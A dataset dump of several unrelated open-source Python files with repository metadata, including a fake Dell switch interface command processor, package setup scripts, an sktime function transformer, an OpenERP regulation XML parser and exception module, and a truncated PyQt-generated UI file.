|
2022-02-11T03:49:01.000Z
|
2022-02-11T03:49:01.000Z
|
fake_switches/dell10g/command_processor/config_interface.py
|
idjaw/fake-switches
|
9b481e17a26cca24bf3ef44466feebf9bff794f8
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 Internap.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from fake_switches.dell.command_processor.config_interface import DellConfigInterfaceCommandProcessor, parse_vlan_list
from fake_switches.switch_configuration import AggregatedPort
class Dell10GConfigInterfaceCommandProcessor(DellConfigInterfaceCommandProcessor):
def __init__(self, switch_configuration, terminal_controller, logger,
piping_processor, port):
super(DellConfigInterfaceCommandProcessor, self).__init__(
switch_configuration, terminal_controller, logger, piping_processor,
port)
self.description_strip_chars = "\"'"
def get_prompt(self):
short_name = self.port.name.split(' ')[1]
return "{}(config-if-{}{})#".format(
self.switch_configuration.name,
"Po" if isinstance(self.port, AggregatedPort) else "Te",
short_name)
def configure_lldp_port(self, args, target_value):
if "transmit".startswith(args[0]):
self.port.lldp_transmit = target_value
elif "receive".startswith(args[0]):
self.port.lldp_receive = target_value
elif "med".startswith(args[0]):
if len(args) == 1:
self.port.lldp_med = target_value
elif "transmit-tlv".startswith(args[1]):
if "capabilities".startswith(args[2]):
self.port.lldp_med_transmit_capabilities = target_value
elif "network-policy".startswith(args[2]):
self.port.lldp_med_transmit_network_policy = target_value
def do_switchport(self, *args):
if "access".startswith(args[0]) and "vlan".startswith(args[1]):
self.set_access_vlan(int(args[2]))
elif "mode".startswith(args[0]):
self.set_switchport_mode(args[1])
elif ("general".startswith(args[0]) or "trunk".startswith(args[0])) and "allowed".startswith(args[1]):
if "vlan".startswith(args[2]) and args[0] == "general":
if len(args) > 5:
self.write_line(" ^")
self.write_line("% Invalid input detected at '^' marker.")
else:
operation = args[3]
vlan_range = args[4]
self.update_trunk_vlans(operation, vlan_range)
return
elif "vlan".startswith(args[2]) and args[0] == "trunk":
if len(args) > 5:
self.write_line(" ^")
self.write_line("% Invalid input detected at '^' marker.")
else:
if args[0:4] == ("trunk", "allowed", "vlan", "add"):
if self.port.trunk_vlans is not None:
self.port.trunk_vlans = sorted(list(set(self.port.trunk_vlans + parse_vlan_list(args[4]))))
elif args[0:4] == ("trunk", "allowed", "vlan", "remove"):
if self.port.trunk_vlans is None:
                            self.port.trunk_vlans = list(range(1, 4097))
for v in parse_vlan_list(args[4]):
if v in self.port.trunk_vlans:
self.port.trunk_vlans.remove(v)
if len(self.port.trunk_vlans) == 0:
self.port.trunk_vlans = None
elif args[0:4] == ("trunk", "allowed", "vlan", "none"):
self.port.trunk_vlans = []
elif args[0:4] == ("trunk", "allowed", "vlan", "all"):
self.port.trunk_vlans = None
elif args[0:3] == ("trunk", "allowed", "vlan"):
self.port.trunk_vlans = parse_vlan_list(args[3])
elif args[0:3] == ("trunk", "native", "vlan"):
self.port.trunk_native_vlan = int(args[3])
elif "general".startswith(args[0]) and "pvid".startswith(args[1]):
self.set_trunk_native_vlan(int(args[2]))
self.write_line("")
def do_no_switchport(self, *args):
if "mode".startswith(args[0]):
self.set_switchport_mode("access")
elif "access".startswith(args[0]):
if "vlan".startswith(args[1]):
self.print_vlan_warning()
self.port.access_vlan = None
elif args[0] in ("trunk", "general") and args[1:3] == ("allowed", "vlan"):
self.port.trunk_vlans = None
elif "general".startswith(args[0]):
if "pvid".startswith(args[1]):
self.port.trunk_native_vlan = None
self.write_line("")
def do_mtu(self, *args):
self.write_line(" ^")
self.write_line("% Invalid input detected at '^' marker.")
self.write_line("")
def do_no_mtu(self, *args):
self.write_line(" ^")
self.write_line("% Invalid input detected at '^' marker.")
self.write_line("")
def set_switchport_mode(self, mode):
if mode not in ("access", "trunk", "general"):
self.write_line(" ^")
self.write_line("% Invalid input detected at '^' marker.")
else:
self.port.mode = mode
def set_trunk_native_vlan(self, native_vlan):
vlan = self.switch_configuration.get_vlan(native_vlan)
if vlan is None:
self.write_line("Could not configure pvid.")
else:
self.port.trunk_native_vlan = vlan.number
def print_vlan_warning(self):
pass
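# Illustrative note (an assumption drawn from the startswith() checks above,
# not documented in the original source): command words may be abbreviated,
# e.g. do_switchport('mo', 'trunk') matches because "mode".startswith('mo')
# holds, and sets the port to trunk mode.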
| 46.77037
| 119
| 0.548939
| 5,556
| 0.879949
| 0
| 0
| 0
| 0
| 0
| 0
| 1,538
| 0.243586
|
fbf2e31cb815224097d8066fca9f33447d38f065
| 939
|
py
|
Python
|
setup.py
|
Spredzy/python-memsource
|
9624a1e93dab9cec874164fb390432c51ab0de31
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
Spredzy/python-memsource
|
9624a1e93dab9cec874164fb390432c51ab0de31
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
Spredzy/python-memsource
|
9624a1e93dab9cec874164fb390432c51ab0de31
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import setuptools
from memsource import version
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="memsource",
version=version.__version__,
author="Yanis Guenane",
author_email="yguenane+opensource@gmail.com",
description="Python bindings for Memsource",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/Spredzy/python-memsource",
packages=setuptools.find_packages(),
install_requires=[
"requests"
],
classifiers=[
"Programming Language :: Python :: 3",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Information Technology",
"License :: OSI Approved :: Apache Software License",
"Operating System :: POSIX :: Linux",
],
python_requires=">=3.6",
)
| 27.617647
| 61
| 0.664537
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 434
| 0.462194
|
fbf375a6746c12699f7672902496fe49ba8773ae
| 5,637
|
py
|
Python
|
sktime/transformations/series/func_transform.py
|
marcio55afr/sktime
|
25ba2f470f037366ca6b0e529137d3d0a6191e2e
|
[
"BSD-3-Clause"
] | 2
|
2021-12-28T10:48:11.000Z
|
2022-03-06T18:08:01.000Z
|
sktime/transformations/series/func_transform.py
|
marcio55afr/sktime
|
25ba2f470f037366ca6b0e529137d3d0a6191e2e
|
[
"BSD-3-Clause"
] | 2
|
2021-04-19T17:38:33.000Z
|
2021-07-25T18:44:10.000Z
|
sktime/transformations/series/func_transform.py
|
marcio55afr/sktime
|
25ba2f470f037366ca6b0e529137d3d0a6191e2e
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3 -u
# -*- coding: utf-8 -*-
"""Implements FunctionTransformer, a class to create custom transformers."""
__author__ = ["Bouke Postma"]
__all__ = ["FunctionTransformer"]
import numpy as np
from sktime.transformations.base import _SeriesToSeriesTransformer
from sktime.utils.validation.series import check_series
def _identity(X):
"""Return X."""
return X
class FunctionTransformer(_SeriesToSeriesTransformer):
r"""Constructs a transformer from an arbitrary callable.
A FunctionTransformer forwards its y (and optionally X) arguments to a
user-defined function or function object and returns the result of this
function. This is useful for stateless transformations such as taking the
log of frequencies, doing custom scaling, etc.
Note: If a lambda is used as the function, then the resulting
transformer will not be pickleable.
Parameters
----------
func : callable, default=None
The callable to use for the transformation. This will be passed
the same arguments as transform, with args and kwargs forwarded.
If func is None, then func will be the identity function.
inverse_func : callable, default=None
The callable to use for the inverse transformation. This will be
passed the same arguments as inverse transform, with args and
kwargs forwarded. If inverse_func is None, then inverse_func
will be the identity function.
check_inverse : bool, default=True
        Whether to check that ``func`` followed by ``inverse_func`` leads to
the original inputs. It can be used for a sanity check, raising a
warning when the condition is not fulfilled.
kw_args : dict, default=None
Dictionary of additional keyword arguments to pass to func.
inv_kw_args : dict, default=None
Dictionary of additional keyword arguments to pass to inverse_func.
See Also
--------
sktime.transformations.series.boxcox.LogTransformer :
Transformer input data using natural log. Can help normalize data and
compress variance of the series.
sktime.transformations.series.exponent.ExponentTransformer :
Transform input data by raising it to an exponent. Can help compress
variance of series if a fractional exponent is supplied.
sktime.transformations.series.exponent.SqrtTransformer :
Transform input data by taking its square root. Can help compress
variance of input series.
Examples
--------
>>> import numpy as np
>>> from sktime.transformations.series.func_transform import FunctionTransformer
>>> transformer = FunctionTransformer(np.log1p, np.expm1)
>>> X = np.array([[0, 1], [2, 3]])
>>> transformer.fit_transform(X)
array([[0. , 0.69314718],
[1.09861229, 1.38629436]])
"""
_tags = {
"handles-missing-data": True,
"fit-in-transform": False,
}
def __init__(
self,
func=None,
inverse_func=None,
*,
check_inverse=True,
kw_args=None,
inv_kw_args=None,
):
self.func = func
self.inverse_func = inverse_func
self.check_inverse = check_inverse
self.kw_args = kw_args
self.inv_kw_args = inv_kw_args
super(FunctionTransformer, self).__init__()
def _check_inverse_transform(self, Z):
"""Check that func and inverse_func are each other's inverse."""
Z_round_trip = self.inverse_func(self.func(Z))
if not np.allclose(Z_round_trip, Z, equal_nan=True):
raise UserWarning(
"The provided functions are not strictly"
" inverse of each other. If you are sure you"
" want to proceed regardless, set"
" 'check_inverse=False'."
)
def fit(self, Z, X=None):
"""Fit data.
Parameters
----------
Z : pd.Series / pd.DataFrame
Series / DataFrame to fit.
X : pd.DataFrame, optional (default=None)
Exogenous data used in transformation.
Returns
-------
self
"""
if self.check_inverse and not (self.func is None or self.inverse_func is None):
self._check_inverse_transform(Z)
self._is_fitted = True
return self
def transform(self, Z, X=None):
"""Transform data.
Parameters
----------
Z : pd.Series / pd.DataFrame
Series / DataFrame to transform.
X : pd.DataFrame, optional (default=None)
Exogenous data used in transformation.
Returns
-------
Zt : pd.Series / pd.DataFrame
Transformed data.
"""
self.check_is_fitted()
Z = check_series(Z)
return self._apply_function(Z, func=self.func, kw_args=self.kw_args)
def inverse_transform(self, Z, X=None):
"""Inverse transform data.
Parameters
----------
Z : pd.Series / pd.DataFrame
Series / DataFrame to transform.
X : pd.DataFrame, optional (default=None)
Exogenous data used in transformation.
Returns
-------
Zt : pd.Series / pd.DataFrame
Inverse transformed data.
"""
self.check_is_fitted()
Z = check_series(Z)
return self._apply_function(Z, func=self.inverse_func, kw_args=self.inv_kw_args)
def _apply_function(self, Z, func=None, kw_args=None):
if func is None:
func = _identity
return func(Z, **(kw_args if kw_args else {}))
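# Hypothetical sketch (np.clip and the bounds are illustrative choices, not
# part of the original docs): shows how kw_args are forwarded to func by
# _apply_function above.
def _demo_kw_args():
    transformer = FunctionTransformer(
        func=np.clip,
        kw_args={"a_min": 0.0, "a_max": 1.0},
        check_inverse=False,
    )
    # clips each value into [0, 1], e.g. [-0.5, 0.3, 1.7] -> [0., 0.3, 1.]
    return transformer.fit_transform(np.array([-0.5, 0.3, 1.7]))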
| 33.553571
| 88
| 0.631896
| 5,244
| 0.930282
| 0
| 0
| 0
| 0
| 0
| 0
| 3,841
| 0.681391
|
fbf4288218731b27d1646ee39344ec7cc83f8d4a
| 13,963
|
py
|
Python
|
regparser/tree/xml_parser/reg_text.py
|
cfpb/regulations-parser
|
9b6e1ab2dbec93a915eb6da9a2d88c723b9ac424
|
[
"CC0-1.0"
] | 36
|
2015-01-05T21:17:36.000Z
|
2020-04-28T21:02:55.000Z
|
regparser/tree/xml_parser/reg_text.py
|
DalavanCloud/regulations-parser
|
9b6e1ab2dbec93a915eb6da9a2d88c723b9ac424
|
[
"CC0-1.0"
] | 49
|
2015-01-28T15:54:25.000Z
|
2018-08-20T20:20:08.000Z
|
regparser/tree/xml_parser/reg_text.py
|
DalavanCloud/regulations-parser
|
9b6e1ab2dbec93a915eb6da9a2d88c723b9ac424
|
[
"CC0-1.0"
] | 23
|
2015-01-28T15:34:18.000Z
|
2021-02-20T10:53:34.000Z
|
# vim: set encoding=utf-8
import re
from lxml import etree
import logging
from regparser import content
from regparser.tree.depth import heuristics, rules, markers as mtypes
from regparser.tree.depth.derive import derive_depths
from regparser.tree.struct import Node
from regparser.tree.paragraph import p_level_of
from regparser.tree.xml_parser.appendices import build_non_reg_text
from regparser.tree import reg_text
from regparser.tree.xml_parser import tree_utils
from settings import PARAGRAPH_HIERARCHY
def get_reg_part(reg_doc):
"""
Depending on source, the CFR part number exists in different places. Fetch
it, wherever it is.
"""
potential_parts = []
potential_parts.extend(
# FR notice
node.attrib['PART'] for node in reg_doc.xpath('//REGTEXT'))
potential_parts.extend(
# e-CFR XML, under PART/EAR
node.text.replace('Pt.', '').strip()
for node in reg_doc.xpath('//PART/EAR')
if 'Pt.' in node.text)
potential_parts.extend(
# e-CFR XML, under FDSYS/HEADING
node.text.replace('PART', '').strip()
for node in reg_doc.xpath('//FDSYS/HEADING')
if 'PART' in node.text)
potential_parts.extend(
# e-CFR XML, under FDSYS/GRANULENUM
node.text.strip() for node in reg_doc.xpath('//FDSYS/GRANULENUM'))
potential_parts = [p for p in potential_parts if p.strip()]
if potential_parts:
return potential_parts[0]
def get_title(reg_doc):
""" Extract the title of the regulation. """
parent = reg_doc.xpath('//PART/HD')[0]
title = parent.text
return title
def preprocess_xml(xml):
"""This transforms the read XML through macros. Each macro consists of
an xpath and a replacement xml string"""
for path, replacement in content.Macros():
replacement = etree.fromstring('<ROOT>' + replacement + '</ROOT>')
for node in xml.xpath(path):
parent = node.getparent()
idx = parent.index(node)
parent.remove(node)
for repl in replacement:
parent.insert(idx, repl)
idx += 1
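# Illustrative macro pair (hypothetical values; real pairs come from
# content.Macros()): path='//GPH' with replacement '<P>[Graphic omitted]</P>'
# would splice that paragraph in place of every GPH node.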
def build_tree(reg_xml):
if isinstance(reg_xml, str) or isinstance(reg_xml, unicode):
doc = etree.fromstring(reg_xml)
else:
doc = reg_xml
preprocess_xml(doc)
reg_part = get_reg_part(doc)
title = get_title(doc)
tree = Node("", [], [reg_part], title)
part = doc.xpath('//PART')[0]
subpart_xmls = [c for c in part.getchildren() if c.tag == 'SUBPART']
if len(subpart_xmls) > 0:
subparts = [build_subpart(reg_part, s) for s in subpart_xmls]
tree.children = subparts
else:
section_xmls = [c for c in part.getchildren() if c.tag == 'SECTION']
sections = []
for section_xml in section_xmls:
sections.extend(build_from_section(reg_part, section_xml))
empty_part = reg_text.build_empty_part(reg_part)
empty_part.children = sections
tree.children = [empty_part]
non_reg_sections = build_non_reg_text(doc, reg_part)
tree.children += non_reg_sections
return tree
def get_subpart_title(subpart_xml):
hds = subpart_xml.xpath('./HD|./RESERVED')
return [hd.text for hd in hds][0]
def build_subpart(reg_part, subpart_xml):
subpart_title = get_subpart_title(subpart_xml)
subpart = reg_text.build_subpart(subpart_title, reg_part)
sections = []
for ch in subpart_xml.getchildren():
if ch.tag == 'SECTION':
sections.extend(build_from_section(reg_part, ch))
subpart.children = sections
return subpart
# @profile
def get_markers(text):
""" Extract all the paragraph markers from text. Do some checks on the
collapsed markers."""
markers = tree_utils.get_paragraph_markers(text)
collapsed_markers = tree_utils.get_collapsed_markers(text)
# Check that the collapsed markers make sense (i.e. are at least one
# level below the initial marker)
if markers and collapsed_markers:
initial_marker_levels = p_level_of(markers[-1])
final_collapsed_markers = []
for collapsed_marker in collapsed_markers:
collapsed_marker_levels = p_level_of(collapsed_marker)
if any(c > f for f in initial_marker_levels
for c in collapsed_marker_levels):
final_collapsed_markers.append(collapsed_marker)
collapsed_markers = final_collapsed_markers
markers_list = [m for m in markers] + [m for m in collapsed_markers]
return markers_list
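# Illustrative behaviour (hypothetical input, not from the original source):
# for tagged text like "(a) In general--(1) ...", the initial marker is 'a'
# and the collapsed marker '1' is kept because it can sit at least one level
# below 'a' in the paragraph hierarchy.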
def get_markers_and_text(node, markers_list):
node_text = tree_utils.get_node_text(node, add_spaces=True)
text_with_tags = tree_utils.get_node_text_tags_preserved(node)
if len(markers_list) > 1:
actual_markers = ['(%s)' % m for m in markers_list]
plain_markers = [m.replace('<E T="03">', '').replace('</E>', '')
for m in actual_markers]
node_texts = tree_utils.split_text(node_text, plain_markers)
tagged_texts = tree_utils.split_text(text_with_tags, actual_markers)
node_text_list = zip(node_texts, tagged_texts)
elif markers_list:
node_text_list = [(node_text, text_with_tags)]
else:
node_text_list = [('', '')]
return zip(markers_list, node_text_list)
def next_marker(xml_node, remaining_markers):
"""Try to determine the marker following the current xml_node. Remaining
    markers is a list of other markers *within* the xml_node. May return
None"""
# More markers in this xml node
if remaining_markers:
return remaining_markers[0][0]
# Check the next xml node; skip over stars
sib = xml_node.getnext()
while sib is not None and sib.tag in ('STARS', 'PRTPAGE'):
sib = sib.getnext()
if sib is not None:
next_text = tree_utils.get_node_text(sib)
next_markers = get_markers(next_text)
if next_markers:
return next_markers[0]
def build_from_section(reg_part, section_xml):
section_texts = []
nodes = []
section_no = section_xml.xpath('SECTNO')[0].text
    section_no_without_marker = re.search(r'[0-9]+\.[0-9]+',
                                          section_no).group(0)
subject_xml = section_xml.xpath('SUBJECT')
if not subject_xml:
subject_xml = section_xml.xpath('RESERVED')
subject_text = subject_xml[0].text
manual_hierarchy = []
if (reg_part in PARAGRAPH_HIERARCHY
and section_no_without_marker in PARAGRAPH_HIERARCHY[reg_part]):
manual_hierarchy = PARAGRAPH_HIERARCHY[reg_part][
section_no_without_marker]
# Collect paragraph markers and section text (intro text for the
# section)
i = 0
children = [ch for ch in section_xml.getchildren()
if ch.tag in ['P', 'STARS']]
for ch in children:
text = tree_utils.get_node_text(ch, add_spaces=True)
tagged_text = tree_utils.get_node_text_tags_preserved(ch)
markers_list = get_markers(tagged_text.strip())
# If the child has a 'DEPTH' attribute, we're in manual
# hierarchy mode, just constructed from the XML instead of
# specified in configuration.
# This presumes that every child in the section has DEPTH
# specified, if not, things will break in and around
# derive_depths below.
if ch.get("depth") is not None:
manual_hierarchy.append(int(ch.get("depth")))
if ch.tag == 'STARS':
nodes.append(Node(label=[mtypes.STARS_TAG]))
elif not markers_list and manual_hierarchy:
# is this a bunch of definitions that don't have numbers next to
# them?
if len(nodes) > 0:
                if (subject_text.find('Definitions.') > -1
                        or nodes[-1].text.find(
                            'For the purposes of this section') > -1):
# TODO: create a grammar for definitions
if text.find('means') > -1:
def_marker = text.split('means')[0].strip().split()
def_marker = ''.join([word[0].upper() + word[1:]
for word in def_marker])
elif text.find('shall have the same meaning') > -1:
def_marker = text.split('shall')[0].strip().split()
def_marker = ''.join([word[0].upper() + word[1:]
for word in def_marker])
else:
def_marker = 'def{0}'.format(i)
i += 1
n = Node(text, label=[def_marker], source_xml=ch)
n.tagged_text = tagged_text
nodes.append(n)
else:
section_texts.append((text, tagged_text))
else:
if len(children) > 1:
def_marker = 'def{0}'.format(i)
n = Node(text, [], [def_marker], source_xml=ch)
n.tagged_text = tagged_text
i += 1
nodes.append(n)
else:
# this is the only node around
section_texts.append((text, tagged_text))
elif not markers_list and not manual_hierarchy:
            # No manual hierarchy specified, append to the section.
section_texts.append((text, tagged_text))
else:
for m, node_text in get_markers_and_text(ch, markers_list):
n = Node(node_text[0], [], [m], source_xml=ch)
n.tagged_text = unicode(node_text[1])
nodes.append(n)
if node_text[0].endswith('* * *'):
nodes.append(Node(label=[mtypes.INLINE_STARS]))
# Trailing stars don't matter; slightly more efficient to ignore them
while nodes and nodes[-1].label[0] in mtypes.stars:
nodes = nodes[:-1]
m_stack = tree_utils.NodeStack()
# Use constraint programming to figure out possible depth assignments
if not manual_hierarchy:
depths = derive_depths(
[node.label[0] for node in nodes],
[rules.depth_type_order([mtypes.lower, mtypes.ints, mtypes.roman,
mtypes.upper, mtypes.em_ints,
mtypes.em_roman])])
if not manual_hierarchy and depths:
# Find the assignment which violates the least of our heuristics
depths = heuristics.prefer_multiple_children(depths, 0.5)
depths = sorted(depths, key=lambda d: d.weight, reverse=True)
depths = depths[0]
for node, par in zip(nodes, depths):
if par.typ != mtypes.stars:
last = m_stack.peek()
node.label = [l.replace('<E T="03">', '').replace('</E>', '')
for l in node.label]
if len(last) == 0:
m_stack.push_last((1 + par.depth, node))
else:
m_stack.add(1 + par.depth, node)
elif nodes and manual_hierarchy:
logging.warning('Using manual depth hierarchy.')
depths = manual_hierarchy
if len(nodes) == len(depths):
for node, spec in zip(nodes, depths):
if isinstance(spec, int):
depth = spec
elif isinstance(spec, tuple):
depth, marker = spec
node.marker = marker
last = m_stack.peek()
node.label = [l.replace('<E T="03">', '').replace('</E>', '')
for l in node.label]
if len(last) == 0:
m_stack.push_last((1 + depth, node))
else:
m_stack.add(1 + depth, node)
else:
logging.error('Manual hierarchy length does not match node '
'list length! ({0} nodes but {1} provided, '
'{2})'.format(
len(nodes),
len(depths),
[x.label[0] for x in nodes]))
elif nodes and not manual_hierarchy:
logging.warning(
'Could not determine depth when parsing {0}:\n{1}'.format(
section_no_without_marker, [node.label[0] for node in nodes]))
for node in nodes:
last = m_stack.peek()
node.label = [l.replace('<E T="03">', '').replace('</E>', '')
for l in node.label]
if len(last) == 0:
m_stack.push_last((3, node))
else:
m_stack.add(3, node)
nodes = []
section_nums = []
for match in re.finditer(r'%s\.(\d+)' % reg_part, section_no):
section_nums.append(int(match.group(1)))
# Span of section numbers
if u'§§' == section_no[:2] and '-' in section_no:
first, last = section_nums
section_nums = []
for i in range(first, last + 1):
section_nums.append(i)
for section_number in section_nums:
section_number = str(section_number)
plain_sect_texts = [s[0] for s in section_texts]
tagged_sect_texts = [s[1] for s in section_texts]
section_title = u"§ " + reg_part + "." + section_number
if subject_text:
section_title += " " + subject_text
section_text = ' '.join([section_xml.text] + plain_sect_texts)
tagged_section_text = ' '.join([section_xml.text] + tagged_sect_texts)
sect_node = Node(section_text, label=[reg_part, section_number],
title=section_title)
sect_node.tagged_text = tagged_section_text
m_stack.add_to_bottom((1, sect_node))
while m_stack.size() > 1:
m_stack.unwind()
nodes.append(m_stack.pop()[0][1])
return nodes
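# Hypothetical usage sketch (the path is a placeholder): build_tree accepts
# either an XML string or a parsed lxml element, per the isinstance checks
# above, and returns the root Node for the regulation part.
def _example_build_tree(path='/tmp/part.xml'):
    with open(path) as f:
        return build_tree(f.read())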
| 37.840108
| 78
| 0.587911
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,321
| 0.166189
|
fbf49444e0f4679af981bbaa8faf8266920ca318
| 1,216
|
py
|
Python
|
setup.py
|
mark-dawn/stytra
|
be1d5be0a44aeb685d475240d056ef7adf60ed06
|
[
"MIT"
] | null | null | null |
setup.py
|
mark-dawn/stytra
|
be1d5be0a44aeb685d475240d056ef7adf60ed06
|
[
"MIT"
] | null | null | null |
setup.py
|
mark-dawn/stytra
|
be1d5be0a44aeb685d475240d056ef7adf60ed06
|
[
"MIT"
] | null | null | null |
from distutils.core import setup
from setuptools import find_packages
setup(
name="stytra",
version="0.1",
author="Vilim Stih, Luigi Petrucco @portugueslab",
author_email="vilim@neuro.mpg.de",
license="MIT",
packages=find_packages(),
install_requires=[
"pyqtgraph>=0.10.0",
"numpy",
"numba",
"matplotlib",
"pandas",
"qdarkstyle",
"qimage2ndarray",
"deepdish",
"param",
"pims",
"GitPython",
"pymongo",
"colorspacious",
"arrayqueues",
],
classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: Science/Research",
# Pick your license as you wish (should match "license" above)
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
],
keywords="tracking processing",
description="A modular package to control stimulation and track behaviour in zebrafish experiments.",
project_urls={
"Source": "https://github.com/portugueslab/stytra",
"Tracker": "https://github.com/portugueslab/stytra/issues",
},
)
| 28.27907
| 105
| 0.591283
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 697
| 0.573191
|
fbf4c0c322e799620006a7ec56b567282c3ba0ca
| 226
|
py
|
Python
|
checkTicTacToe/checkTicTacToe.py
|
nate-ar-williams/coding-questions
|
24baa901a786e6e2c4e8ea823a26416bc51e1f6a
|
[
"MIT"
] | null | null | null |
checkTicTacToe/checkTicTacToe.py
|
nate-ar-williams/coding-questions
|
24baa901a786e6e2c4e8ea823a26416bc51e1f6a
|
[
"MIT"
] | null | null | null |
checkTicTacToe/checkTicTacToe.py
|
nate-ar-williams/coding-questions
|
24baa901a786e6e2c4e8ea823a26416bc51e1f6a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# let board be a 3x3 array; each cell holds 'X', 'O' or None


def isWin(board):
    # collect every line that can win: the three rows, three columns,
    # and both diagonals
    lines = [row for row in board]
    lines += [[board[r][c] for r in range(3)] for c in range(3)]
    lines.append([board[i][i] for i in range(3)])
    lines.append([board[i][2 - i] for i in range(3)])
    # a line wins when all three cells are filled by the same player
    return any(line[0] is not None and line[0] == line[1] == line[2]
               for line in lines)
def main():
pass
if __name__ == '__main__':
main()
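# Hypothetical quick checks (boards are illustrative):
#   isWin([['X', 'X', 'X'], [None, 'O', None], ['O', None, None]])  # True
#   isWin([[None] * 3, [None] * 3, [None] * 3])                     # False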
| 12.555556
| 32
| 0.588496
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 57
| 0.252212
|
fbf52c7f3a9bab66d56f2bccbaf8974ecb5420d3
| 2,138
|
py
|
Python
|
openerp/exceptions.py
|
ntiufalara/openerp7
|
903800da0644ec0dd9c1dcd34205541f84d45fe4
|
[
"MIT"
] | 3
|
2016-01-29T14:39:49.000Z
|
2018-12-29T22:42:00.000Z
|
openerp/exceptions.py
|
ntiufalara/openerp7
|
903800da0644ec0dd9c1dcd34205541f84d45fe4
|
[
"MIT"
] | 2
|
2016-03-23T14:29:41.000Z
|
2017-02-20T17:11:30.000Z
|
openerp/exceptions.py
|
ntiufalara/openerp7
|
903800da0644ec0dd9c1dcd34205541f84d45fe4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" OpenERP core exceptions.
This module defines a few exception types. Those types are understood by the
RPC layer. Any other exception type bubbling until the RPC layer will be
treated as a 'Server error'.
"""
class Warning(Exception):
pass
class AccessDenied(Exception):
""" Login/password error. No message, no traceback. """
def __init__(self):
super(AccessDenied, self).__init__('Access denied.')
self.traceback = ('', '', '')
class AccessError(Exception):
""" Access rights error. """
class DeferredException(Exception):
""" Exception object holding a traceback for asynchronous reporting.
Some RPC calls (database creation and report generation) happen with
an initial request followed by multiple, polling requests. This class
    is used to store the possible exception occurring in the thread serving
the first request, and is then sent to a polling request.
    ('Traceback' is misleading, this is really an exc_info() triple.)
"""
def __init__(self, msg, tb):
self.message = msg
self.traceback = tb
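# Hypothetical usage sketch (function names are placeholders): the thread
# serving the initial request stores the failure,
#     import sys
#     deferred = DeferredException('database creation failed', sys.exc_info())
# and a later polling request reads deferred.message / deferred.traceback.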
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| 37.508772
| 78
| 0.658092
| 868
| 0.405987
| 0
| 0
| 0
| 0
| 0
| 0
| 1,774
| 0.829747
|
fbf6f8315c8b89ca91d3b286cb9fd7bfaffd9e47
| 83,653
|
py
|
Python
|
MainUi.py
|
james646-hs/Fgo_teamup
|
f1e5c6f514818b68e9abb9eab3c6103fd000819a
|
[
"MIT"
] | 18
|
2020-05-30T01:41:24.000Z
|
2021-03-04T08:07:35.000Z
|
MainUi.py
|
james646-hs/Fgo_teamup
|
f1e5c6f514818b68e9abb9eab3c6103fd000819a
|
[
"MIT"
] | 1
|
2020-08-13T02:19:42.000Z
|
2020-08-13T02:19:42.000Z
|
MainUi.py
|
james646-hs/Fgo_teamup
|
f1e5c6f514818b68e9abb9eab3c6103fd000819a
|
[
"MIT"
] | 2
|
2020-06-13T18:23:07.000Z
|
2020-08-13T02:08:54.000Z
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'MainUi.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.setEnabled(True)
MainWindow.resize(1070, 837)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())
MainWindow.setSizePolicy(sizePolicy)
MainWindow.setMinimumSize(QtCore.QSize(0, 0))
MainWindow.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout_2.setContentsMargins(5, 10, 5, 5)
self.verticalLayout_2.setSpacing(5)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.groupBox = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox.setTitle("")
self.groupBox.setObjectName("groupBox")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.groupBox)
self.verticalLayout_3.setContentsMargins(5, 5, 5, 5)
self.verticalLayout_3.setSpacing(5)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.gridLayout_3 = QtWidgets.QGridLayout()
